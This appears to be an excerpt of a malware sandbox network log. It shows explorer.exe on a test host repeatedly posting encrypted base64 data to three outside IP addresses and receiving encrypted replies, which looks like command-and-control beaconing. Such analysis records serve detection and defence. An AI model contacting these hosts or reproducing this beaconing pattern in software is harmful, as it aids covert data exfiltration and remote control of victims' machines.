                                                                                    2024-07-24 17:58:39 UTC685INData Raw: 4e 68 44 4e 6e 68 76 6b 31 45 75 6c 55 49 38 64 6f 50 44 73 42 6d 4e 73 4d 31 32 4b 76 46 6b 6f 34 64 4b 30 68 48 4c 77 50 66 4a 65 65 75 38 50 31 43 68 38 2b 52 44 50 46 47 7a 42 79 66 45 79 6a 51 49 4d 37 43 39 33 73 65 59 46 75 76 54 57 35 61 41 64 4a 4e 52 44 74 35 77 71 42 6a 6a 49 30 2f 52 31 4c 74 53 37 31 49 75 35 75 75 50 41 51 34 67 79 4d 4b 54 54 2b 52 52 2f 61 31 50 54 58 42 35 69 43 51 58 49 68 6c 2b 6b 50 34 49 70 2b 74 65 38 43 7a 49 30 34 64 75 6b 34 71 6a 4f 6f 64 49 4a 2b 39 6d 59 50 49 6e 78 63 49 6c 37 4b 66 53 30 63 55 41 42 72 6c 70 30 55 69 64 59 78 59 72 78 64 63 59 69 55 6a 52 67 59 6a 5a 53 43 65 35 6c 78 44 46 5a 43 54 58 37 69 67 70 61 62 55 57 78 74 77 69 48 69 65 2b 56 66 50 4b 50 4b 78 72 68 77 6b 2b 4e 68 32 48 6a 5a 45 44
                                                                                    Data Ascii: NhDNnhvk1EulUI8doPDsBmNsM12KvFko4dK0hHLwPfJeeu8P1Ch8+RDPFGzByfEyjQIM7C93seYFuvTW5aAdJNRDt5wqBjjI0/R1LtS71Iu5uuPAQ4gyMKTT+RR/a1PTXB5iCQXIhl+kP4Ip+te8CzI04duk4qjOodIJ+9mYPInxcIl7KfS0cUABrlp0UidYxYrxdcYiUjRgYjZSCe5lxDFZCTX7igpabUWxtwiHie+VfPKPKxrhwk+Nh2HjZED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    82192.168.2.1049838167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:40 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:40 UTC1122OUTData Raw: 68 36 30 53 30 55 61 6f 58 61 34 30 72 42 63 59 2b 2f 4e 58 77 73 30 54 37 71 6a 58 55 79 4f 43 59 39 44 31 68 4b 53 2f 41 65 34 6d 47 31 59 6b 55 57 50 37 55 75 43 6c 4d 53 63 56 54 65 41 58 66 73 41 67 72 2f 58 7a 6c 66 49 6b 59 63 2b 30 30 61 74 35 2f 72 47 48 66 41 50 7a 4d 41 59 6e 45 4b 69 36 71 58 64 59 46 41 4f 31 4d 55 5a 5a 75 79 41 61 72 6e 50 33 4f 32 78 41 62 74 30 56 4d 4e 41 76 78 43 66 62 7a 36 4d 6d 53 36 2f 4f 36 47 78 41 55 31 31 4b 72 48 52 5a 6a 38 6e 57 58 6b 61 44 72 4c 75 48 34 70 6f 71 74 79 2f 55 43 30 53 67 2f 37 6f 63 7a 76 74 43 47 52 6b 4b 77 51 6c 32 70 4e 2b 63 61 33 53 5a 64 52 56 59 66 4e 62 43 67 32 35 4b 6d 70 34 2f 58 33 78 34 72 49 79 43 6f 33 33 4a 6c 2f 64 66 74 69 76 41 79 33 2b 55 32 31 59 46 54 46 4f 39 31 41 53
                                                                                    Data Ascii: h60S0UaoXa40rBcY+/NXws0T7qjXUyOCY9D1hKS/Ae4mG1YkUWP7UuClMScVTeAXfsAgr/XzlfIkYc+00at5/rGHfAPzMAYnEKi6qXdYFAO1MUZZuyAarnP3O2xAbt0VMNAvxCfbz6MmS6/O6GxAU11KrHRZj8nWXkaDrLuH4poqty/UC0Sg/7oczvtCGRkKwQl2pN+ca3SZdRVYfNbCg25Kmp4/X3x4rIyCo33Jl/dftivAy3+U21YFTFO91AS
                                                                                    2024-07-24 17:58:41 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:41 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:41 UTC685INData Raw: 63 47 7a 74 4a 7a 77 4a 7a 32 6c 39 2f 47 6a 76 2b 30 31 6a 77 48 2b 49 34 43 32 7a 4c 52 67 6c 6f 76 50 51 35 55 4f 63 57 4e 63 4f 48 66 73 62 2b 44 58 45 55 41 75 37 48 57 72 56 6b 4a 41 68 67 57 65 42 7a 77 4d 43 4e 65 63 51 48 39 54 33 68 63 61 47 2b 53 6e 79 56 42 59 41 79 36 4d 52 67 38 42 71 42 59 6e 71 4c 77 66 57 6c 58 58 53 30 48 53 38 6f 31 42 69 44 46 46 52 2b 37 75 45 2b 71 7a 75 55 47 6b 73 52 50 2f 32 37 77 57 6f 42 79 71 72 38 42 72 36 51 53 68 31 5a 50 71 46 34 47 5a 72 45 73 6b 62 6a 65 34 34 32 48 65 41 59 61 44 58 37 6c 4c 6e 35 77 73 72 6c 4c 5a 50 34 66 73 49 44 70 4a 67 4d 65 65 77 7a 6e 6e 55 74 6a 7a 5a 6c 4c 62 66 35 78 74 43 46 56 55 75 62 72 33 64 39 57 74 54 55 55 7a 46 77 6b 50 46 6c 53 6b 77 57 31 76 78 4e 56 32 61 49 51 44
                                                                                    Data Ascii: cGztJzwJz2l9/Gjv+01jwH+I4C2zLRglovPQ5UOcWNcOHfsb+DXEUAu7HWrVkJAhgWeBzwMCNecQH9T3hcaG+SnyVBYAy6MRg8BqBYnqLwfWlXXS0HS8o1BiDFFR+7uE+qzuUGksRP/27wWoByqr8Br6QSh1ZPqF4GZrEskbje442HeAYaDX7lLn5wsrlLZP4fsIDpJgMeewznnUtjzZlLbf5xtCFVUubr3d9WtTUUzFwkPFlSkwW1vxNV2aIQD


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    83192.168.2.1049839107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:42 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:58:42 UTC1267OUTData Raw: 64 32 4f 67 47 7a 67 39 43 33 6d 67 6c 4d 4b 69 61 46 72 6c 66 65 68 48 70 66 56 30 76 35 4d 51 72 6e 70 55 6e 63 4c 63 59 4a 6f 53 6a 34 69 6a 4e 69 57 55 31 56 31 6e 36 2f 79 66 74 78 56 6b 49 66 78 54 43 69 4a 76 5a 78 50 58 65 75 6f 62 56 59 4b 72 42 46 65 53 48 52 38 73 66 59 6a 63 4a 52 42 56 66 6b 30 4f 4d 2f 6e 46 55 4c 4b 64 31 63 32 4e 57 48 7a 30 35 54 4f 72 50 78 67 71 34 37 37 7a 45 48 47 33 33 79 57 30 44 32 63 69 34 6b 67 44 45 57 55 72 6e 57 6d 63 72 31 79 77 43 6e 52 73 45 71 32 5a 66 43 4f 54 6c 2b 6a 76 50 74 46 68 2f 53 51 69 46 73 33 72 66 4e 71 4e 6d 4d 57 33 50 72 44 36 2f 54 71 33 42 50 4d 4d 48 5a 33 68 64 4b 48 6e 36 66 44 44 57 58 39 42 65 69 6d 75 44 72 39 4b 6b 38 34 2b 49 73 37 50 48 7a 59 52 43 53 49 6c 6d 55 45 55 32 72 4c
                                                                                    Data Ascii: d2OgGzg9C3mglMKiaFrlfehHpfV0v5MQrnpUncLcYJoSj4ijNiWU1V1n6/yftxVkIfxTCiJvZxPXeuobVYKrBFeSHR8sfYjcJRBVfk0OM/nFULKd1c2NWHz05TOrPxgq477zEHG33yW0D2ci4kgDEWUrnWmcr1ywCnRsEq2ZfCOTl+jvPtFh/SQiFs3rfNqNmMW3PrD6/Tq3BPMMHZ3hdKHn6fDDWX9BeimuDr9Kk84+Is7PHzYRCSIlmUEU2rL
                                                                                    2024-07-24 17:58:43 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:43 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:43 UTC685INData Raw: 65 62 7a 33 45 53 37 62 2b 30 35 63 34 71 4f 34 71 34 38 31 4b 41 46 4e 6c 6c 4f 61 71 75 58 4d 48 45 6f 6c 43 4a 64 79 6d 78 2f 2b 52 79 71 43 50 4c 62 54 78 73 42 78 51 68 59 68 35 30 32 4f 6b 31 67 47 41 78 4e 2f 6d 6d 77 37 34 66 54 32 37 59 32 62 53 67 31 74 61 36 6c 79 56 36 71 71 30 73 6b 68 4c 6c 4c 48 76 6c 57 52 56 77 31 2f 73 69 4a 47 71 36 34 4a 55 36 47 68 39 64 65 44 30 62 4b 72 2f 41 32 6a 34 7a 5a 36 33 74 34 2f 33 33 32 79 51 77 32 6a 68 6f 2f 34 6e 75 44 4e 4d 72 42 49 64 55 58 6b 36 78 77 47 5a 69 52 42 43 49 49 5a 33 58 6f 43 4a 62 42 4a 51 49 51 48 77 37 39 2f 70 6a 63 77 44 44 48 36 4c 2f 39 4a 43 73 5a 71 47 62 32 6a 61 4c 50 4b 33 66 4a 52 7a 7a 6e 73 52 56 2f 4e 66 62 6d 78 52 6d 47 4d 43 6a 54 2b 4e 62 42 79 42 6f 71 67 42 63 4c
                                                                                    Data Ascii: ebz3ES7b+05c4qO4q481KAFNllOaquXMHEolCJdymx/+RyqCPLbTxsBxQhYh502Ok1gGAxN/mmw74fT27Y2bSg1ta6lyV6qq0skhLlLHvlWRVw1/siJGq64JU6Gh9deD0bKr/A2j4zZ63t4/332yQw2jho/4nuDNMrBIdUXk6xwGZiRBCIIZ3XoCJbBJQIQHw79/pjcwDDH6L/9JCsZqGb2jaLPK3fJRzznsRV/NfbmxRmGMCjT+NbByBoqgBcL


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    84192.168.2.1049841107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:44 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:44 UTC1122OUTData Raw: 45 45 68 6a 69 49 6d 70 37 71 6b 75 33 58 41 71 38 63 53 56 33 38 57 50 50 79 37 62 6f 52 43 45 64 55 71 71 4d 5a 4f 4b 51 36 58 44 68 7a 6c 79 4f 73 4f 6d 47 75 51 62 50 64 44 6e 54 38 51 54 7a 67 79 2b 35 4b 45 4f 4c 42 74 31 4a 62 78 45 56 62 57 4a 58 4f 45 2b 35 41 78 4a 6e 32 69 79 64 4d 34 4d 34 55 59 36 74 7a 2f 33 33 64 79 75 69 47 2f 38 6f 57 4e 4b 67 77 6d 77 39 73 6d 31 44 58 6d 32 34 47 4d 46 79 77 57 50 67 39 53 6c 62 68 61 55 6c 66 4a 45 73 46 6b 66 4d 36 34 74 4c 64 47 46 6f 69 6a 61 46 6c 38 31 61 38 44 45 34 49 45 6f 50 50 44 79 4e 33 62 4d 43 64 41 73 62 56 58 33 32 55 4f 69 75 42 43 56 46 64 6c 64 53 2b 47 53 58 57 6c 53 61 6d 41 69 54 77 4c 70 79 34 42 36 71 61 62 69 71 47 59 5a 66 77 75 71 5a 75 69 67 61 58 47 72 59 2f 71 35 6e 55 32
                                                                                    Data Ascii: EEhjiImp7qku3XAq8cSV38WPPy7boRCEdUqqMZOKQ6XDhzlyOsOmGuQbPdDnT8QTzgy+5KEOLBt1JbxEVbWJXOE+5AxJn2iydM4M4UY6tz/33dyuiG/8oWNKgwmw9sm1DXm24GMFywWPg9SlbhaUlfJEsFkfM64tLdGFoijaFl81a8DE4IEoPPDyN3bMCdAsbVX32UOiuBCVFdldS+GSXWlSamAiTwLpy4B6qabiqGYZfwuqZuigaXGrY/q5nU2
                                                                                    2024-07-24 17:58:45 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:45 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:45 UTC685INData Raw: 4b 61 2f 33 72 47 78 36 32 73 51 39 71 71 37 63 4f 2f 72 47 34 6f 43 57 57 33 69 67 52 78 5a 6e 4c 72 51 57 4a 72 41 46 4b 2f 6d 79 46 38 6c 78 33 4b 4e 4b 73 36 6f 49 57 37 61 54 4d 4e 47 36 37 50 7a 64 46 2b 64 67 4a 5a 6d 2f 77 71 54 6c 66 69 63 68 6f 36 45 6d 37 6a 64 68 6d 4a 36 32 58 44 62 4e 68 57 4f 76 55 63 68 2b 4e 48 74 4e 33 6a 58 6d 33 46 62 4b 48 31 52 55 56 42 42 50 5a 7a 6b 6c 6b 45 42 58 61 77 54 4c 78 66 70 4e 56 38 73 42 61 76 4f 67 37 36 78 45 59 32 64 67 32 76 54 69 44 6d 7a 5a 63 6d 77 53 59 31 69 51 48 39 37 32 62 6a 32 53 6b 56 61 2f 42 45 32 78 50 7a 7a 30 75 39 6e 49 78 54 32 32 7a 5a 78 4d 6a 37 66 74 38 57 50 57 4d 5a 4f 6d 7a 47 65 56 6f 57 70 73 4e 48 79 69 58 70 68 72 69 52 55 42 55 66 52 55 7a 64 6f 6a 64 44 6a 63 4b 67 33
                                                                                    Data Ascii: Ka/3rGx62sQ9qq7cO/rG4oCWW3igRxZnLrQWJrAFK/myF8lx3KNKs6oIW7aTMNG67PzdF+dgJZm/wqTlficho6Em7jdhmJ62XDbNhWOvUch+NHtN3jXm3FbKH1RUVBBPZzklkEBXawTLxfpNV8sBavOg76xEY2dg2vTiDmzZcmwSY1iQH972bj2SkVa/BE2xPzz0u9nIxT22zZxMj7ft8WPWMZOmzGeVoWpsNHyiXphriRUBUfRUzdojdDjcKg3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    85192.168.2.1049842167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:46 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:46 UTC1122OUTData Raw: 47 44 66 56 37 30 4f 48 63 4c 30 4f 47 30 53 63 56 74 79 71 52 62 4c 51 33 6b 36 35 4a 38 53 4f 61 76 73 6c 48 32 43 46 69 49 7a 6f 4a 35 6c 78 58 68 4e 56 45 63 47 73 53 46 4a 36 76 50 45 42 6d 6d 4c 4b 75 54 69 59 6c 6d 39 79 6c 4a 64 70 55 65 4b 76 70 50 56 55 33 4a 77 6e 45 49 56 37 69 48 5a 6a 73 57 56 68 41 54 74 50 6a 6c 4b 58 45 30 65 69 42 71 4c 6b 59 35 69 58 42 42 52 31 74 33 39 32 41 62 64 6a 73 32 53 58 35 6f 32 32 63 4c 67 4f 56 6b 55 52 53 54 48 79 77 44 4e 2b 4f 4d 4f 35 5a 53 73 72 6b 79 56 6b 72 42 79 6a 58 56 52 73 55 49 53 51 44 53 67 30 59 34 5a 49 48 68 56 4b 70 56 58 64 36 66 58 62 6d 7a 50 41 70 50 47 53 76 74 72 2b 46 31 2f 52 6c 34 71 46 4c 50 57 6b 70 59 50 76 62 6f 6d 49 2b 35 33 49 42 33 6c 6a 2f 42 50 6b 77 64 48 63 7a 78 66
                                                                                    Data Ascii: GDfV70OHcL0OG0ScVtyqRbLQ3k65J8SOavslH2CFiIzoJ5lxXhNVEcGsSFJ6vPEBmmLKuTiYlm9ylJdpUeKvpPVU3JwnEIV7iHZjsWVhATtPjlKXE0eiBqLkY5iXBBR1t392Abdjs2SX5o22cLgOVkURSTHywDN+OMO5ZSsrkyVkrByjXVRsUISQDSg0Y4ZIHhVKpVXd6fXbmzPApPGSvtr+F1/Rl4qFLPWkpYPvbomI+53IB3lj/BPkwdHczxf
                                                                                    2024-07-24 17:58:47 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:47 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:47 UTC685INData Raw: 52 4e 52 41 44 62 76 31 77 34 69 64 70 4d 74 52 6e 79 72 72 67 76 38 36 58 4c 49 57 74 58 31 41 45 39 45 7a 53 54 4d 36 6f 58 65 34 66 6b 50 30 47 4f 74 31 43 69 51 72 47 5a 31 2b 48 77 59 2b 52 78 49 2f 7a 6b 63 4c 73 34 68 66 76 48 4d 78 50 79 5a 64 30 57 58 69 4b 70 61 35 6e 44 55 6d 55 49 41 41 35 77 48 6c 48 68 72 73 68 67 34 57 55 55 42 30 49 6f 36 78 58 4a 75 61 69 32 70 46 5a 59 71 52 62 71 6c 6f 62 53 75 66 32 52 34 53 57 52 31 63 42 6c 45 75 51 43 75 5a 7a 55 38 68 58 46 6c 43 58 72 6e 5a 4c 6e 6b 52 35 76 4b 63 71 75 73 35 2f 79 47 53 56 58 63 63 56 4a 37 6c 36 42 56 6b 69 42 49 75 43 51 6a 58 63 46 70 69 4f 4b 4d 6c 46 46 6f 38 6c 39 5a 66 79 58 6a 51 4c 73 4c 45 2b 53 67 43 74 43 43 34 4d 6c 5a 2f 31 59 38 38 34 4d 30 46 7a 43 32 74 31 71 49
                                                                                    Data Ascii: RNRADbv1w4idpMtRnyrrgv86XLIWtX1AE9EzSTM6oXe4fkP0GOt1CiQrGZ1+HwY+RxI/zkcLs4hfvHMxPyZd0WXiKpa5nDUmUIAA5wHlHhrshg4WUUB0Io6xXJuai2pFZYqRbqlobSuf2R4SWR1cBlEuQCuZzU8hXFlCXrnZLnkR5vKcqus5/yGSVXccVJ7l6BVkiBIuCQjXcFpiOKMlFFo8l9ZfyXjQLsLE+SgCtCC4MlZ/1Y884M0FzC2t1qI


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    86192.168.2.1049843107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:48 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:48 UTC1122OUTData Raw: 65 6c 65 36 59 4f 69 2f 45 46 68 79 39 70 4a 64 77 75 73 36 58 6c 63 43 64 43 4d 58 6a 42 73 4f 36 72 46 4b 6c 75 49 46 6f 7a 36 4c 73 58 77 58 4f 66 69 36 77 35 66 6d 56 5a 47 52 69 4c 63 6c 66 36 41 43 78 4b 52 57 6f 4d 6e 4b 4e 37 76 50 6a 56 54 6a 49 6d 75 77 5a 49 76 73 6c 38 68 30 44 6e 68 54 62 67 77 73 69 7a 76 56 68 42 65 39 75 61 45 65 46 77 34 45 4e 62 54 31 32 2f 2b 6f 64 53 6b 6a 6b 45 79 32 6b 61 4f 52 31 6f 4c 38 77 63 45 5a 61 4a 34 5a 71 49 73 76 33 42 4d 65 6b 4d 58 4c 4d 73 61 6a 59 31 6a 72 32 77 34 70 46 61 44 57 62 30 4a 54 47 65 35 4d 45 74 4a 4b 44 32 5a 4d 64 4c 44 50 38 61 45 73 68 57 61 54 45 2b 4b 47 45 44 43 6e 56 73 54 38 46 78 77 51 4a 6a 53 54 6b 66 59 50 4c 61 6c 4c 79 54 34 64 51 63 63 54 55 43 6e 62 63 39 2f 57 64 53 31
                                                                                    Data Ascii: ele6YOi/EFhy9pJdwus6XlcCdCMXjBsO6rFKluIFoz6LsXwXOfi6w5fmVZGRiLclf6ACxKRWoMnKN7vPjVTjImuwZIvsl8h0DnhTbgwsizvVhBe9uaEeFw4ENbT12/+odSkjkEy2kaOR1oL8wcEZaJ4ZqIsv3BMekMXLMsajY1jr2w4pFaDWb0JTGe5MEtJKD2ZMdLDP8aEshWaTE+KGEDCnVsT8FxwQJjSTkfYPLalLyT4dQccTUCnbc9/WdS1
                                                                                    2024-07-24 17:58:49 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:49 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:49 UTC685INData Raw: 6a 4f 56 4d 2f 51 32 6a 6b 63 30 6b 4e 44 75 78 6c 58 31 33 53 77 7a 6b 76 62 39 56 75 76 75 4a 4a 4a 6d 76 51 35 6a 35 66 78 64 4c 79 63 32 2b 66 52 48 51 4b 42 56 4f 59 6c 38 6e 62 74 37 6f 62 33 37 4b 43 33 32 57 46 6d 4c 58 79 4f 33 67 48 63 52 4b 45 38 4d 36 57 6c 62 57 4b 4b 6b 5a 73 58 69 47 6e 65 50 57 54 33 36 65 46 53 49 6c 51 38 57 33 78 59 54 2f 47 4f 30 77 77 39 35 56 45 35 6b 51 4a 51 75 73 69 73 4e 6d 73 66 6c 44 53 62 42 31 71 67 77 70 66 6c 6b 38 42 56 4b 54 4d 62 31 51 64 75 6f 41 45 6f 6f 37 79 6e 77 4c 59 33 35 46 76 4c 50 39 72 5a 44 4b 66 67 78 50 49 58 73 79 4b 70 67 69 61 74 6a 61 6b 68 31 53 35 69 70 61 2b 32 4f 72 66 79 46 57 35 63 31 73 56 2b 64 68 55 6d 51 63 32 6e 4a 72 4a 63 56 4f 51 73 2f 4d 6a 6f 6e 61 4a 41 4d 55 66 52 69
                                                                                    Data Ascii: jOVM/Q2jkc0kNDuxlX13Swzkvb9VuvuJJJmvQ5j5fxdLyc2+fRHQKBVOYl8nbt7ob37KC32WFmLXyO3gHcRKE8M6WlbWKKkZsXiGnePWT36eFSIlQ8W3xYT/GO0ww95VE5kQJQusisNmsflDSbB1qgwpflk8BVKTMb1QduoAEoo7ynwLY35FvLP9rZDKfgxPIXsyKpgiatjakh1S5ipa+2OrfyFW5c1sV+dhUmQc2nJrJcVOQs/MjonaJAMUfRi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    87192.168.2.1049844107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:50 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:50 UTC1122OUTData Raw: 6b 7a 50 66 4e 39 64 6a 31 49 70 6c 46 67 2f 72 71 5a 31 33 77 54 57 50 67 62 45 38 56 51 78 6d 68 78 54 66 4d 35 69 41 50 35 6d 62 68 65 71 4a 4a 66 5a 57 4c 2f 61 79 36 76 6e 63 6f 31 54 31 67 33 34 4c 4a 54 65 53 38 46 49 6b 4a 51 51 30 68 57 34 66 30 38 58 50 57 41 4b 70 31 76 49 31 7a 44 64 73 5a 6d 41 44 33 56 4f 4a 69 6f 6a 65 47 69 79 6d 52 61 4a 54 61 37 76 77 47 36 44 48 44 59 57 45 78 45 56 43 63 33 72 69 55 73 62 4f 30 52 2f 45 52 2f 4b 31 51 76 58 56 66 58 7a 6a 51 6a 51 63 58 37 2b 53 58 55 30 55 4f 70 67 43 32 65 67 6e 55 55 52 56 44 31 68 69 57 77 52 42 7a 66 44 33 51 67 75 41 4d 49 4c 52 71 76 61 49 79 4f 59 47 37 55 39 50 42 6d 6e 5a 4f 59 42 4f 73 62 66 33 69 78 67 70 4a 42 65 62 35 67 79 52 67 39 58 79 67 79 72 69 49 31 75 53 72 64 58
                                                                                    Data Ascii: kzPfN9dj1IplFg/rqZ13wTWPgbE8VQxmhxTfM5iAP5mbheqJJfZWL/ay6vnco1T1g34LJTeS8FIkJQQ0hW4f08XPWAKp1vI1zDdsZmAD3VOJiojeGiymRaJTa7vwG6DHDYWExEVCc3riUsbO0R/ER/K1QvXVfXzjQjQcX7+SXU0UOpgC2egnUURVD1hiWwRBzfD3QguAMILRqvaIyOYG7U9PBmnZOYBOsbf3ixgpJBeb5gyRg9XygyriI1uSrdX
                                                                                    2024-07-24 17:58:52 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:51 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:58:52 UTC685INData Raw: 4a 59 6b 59 53 48 6e 78 74 78 44 4b 53 37 6c 68 31 4f 6c 79 2b 62 41 79 36 48 45 43 53 61 33 6a 65 30 54 4e 2f 54 6f 4e 65 74 2f 33 43 4e 33 4e 50 2f 32 4d 79 69 58 57 59 32 37 63 6a 4b 33 74 75 76 31 53 77 70 56 38 42 2b 76 61 5a 63 43 4a 70 39 30 73 77 56 35 49 4f 45 7a 71 68 76 48 36 6e 77 64 56 64 55 74 79 64 6a 46 55 55 48 41 76 53 44 72 7a 4e 53 52 36 5a 66 6d 4d 51 68 6c 4d 4b 36 4d 73 59 57 44 34 74 79 4c 31 42 55 76 6c 41 74 66 67 35 44 67 34 63 6c 56 53 6e 76 70 4f 75 7a 69 43 6c 56 43 68 4b 4b 44 6e 62 78 7a 53 49 43 69 33 58 54 52 6b 72 35 74 30 56 4c 52 53 74 68 72 52 63 72 6d 56 43 75 45 6d 6d 76 71 7a 35 6f 37 6a 38 51 4d 53 6e 2f 78 31 57 58 79 49 36 53 63 52 4b 71 50 64 37 35 4f 57 74 59 65 6d 74 35 37 56 51 46 68 61 57 30 33 46 45 36 34
                                                                                    Data Ascii: JYkYSHnxtxDKS7lh1Oly+bAy6HECSa3je0TN/ToNet/3CN3NP/2MyiXWY27cjK3tuv1SwpV8B+vaZcCJp90swV5IOEzqhvH6nwdVdUtydjFUUHAvSDrzNSR6ZfmMQhlMK6MsYWD4tyL1BUvlAtfg5Dg4clVSnvpOuziClVChKKDnbxzSICi3XTRkr5t0VLRSthrRcrmVCuEmmvqz5o7j8QMSn/x1WXyI6ScRKqPd75OWtYemt57VQFhaW03FE64


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    88192.168.2.1049845167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:58:52 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:58:52 UTC1122OUTData Raw: 45 57 43 72 6a 67 55 72 63 36 35 43 63 48 38 78 4e 70 79 36 66 37 74 4b 4f 37 6d 49 6c 35 36 54 47 41 4d 4b 35 2f 44 78 77 6c 68 59 49 36 66 74 76 74 4e 64 4a 77 4a 37 54 78 63 6e 44 44 76 30 4a 69 45 73 6e 73 4d 37 6f 42 43 58 31 58 78 5a 30 64 49 78 37 70 48 32 64 5a 41 4e 58 4f 59 72 68 48 74 30 57 35 61 66 68 4c 76 57 79 61 4a 70 7a 48 75 52 4b 59 42 63 4c 56 31 78 72 6f 59 72 78 42 4b 61 48 76 70 58 76 59 65 57 79 7a 51 35 6e 66 6c 56 6e 47 51 4c 6b 4d 79 5a 35 48 77 35 4c 69 46 36 34 34 61 70 30 43 52 77 6b 54 34 51 38 62 4a 67 73 46 4c 65 2b 33 48 5a 50 4a 33 4d 51 31 6f 4b 33 6e 64 68 5a 69 6a 4a 77 66 6d 56 65 67 4e 6c 61 56 54 6c 6f 53 43 64 6d 36 47 44 76 37 59 59 2f 49 64 33 51 61 4e 65 48 63 73 2f 53 64 78 50 6e 73 37 34 71 36 6f 50 55 70 70
                                                                                    Data Ascii: EWCrjgUrc65CcH8xNpy6f7tKO7mIl56TGAMK5/DxwlhYI6ftvtNdJwJ7TxcnDDv0JiEsnsM7oBCX1XxZ0dIx7pH2dZANXOYrhHt0W5afhLvWyaJpzHuRKYBcLV1xroYrxBKaHvpXvYeWyzQ5nflVnGQLkMyZ5Hw5LiF644ap0CRwkT4Q8bJgsFLe+3HZPJ3MQ1oK3ndhZijJwfmVegNlaVTloSCdm6GDv7YY/Id3QaNeHcs/SdxPns74q6oPUpp
                                                                                    2024-07-24 17:58:53 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:58:53 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
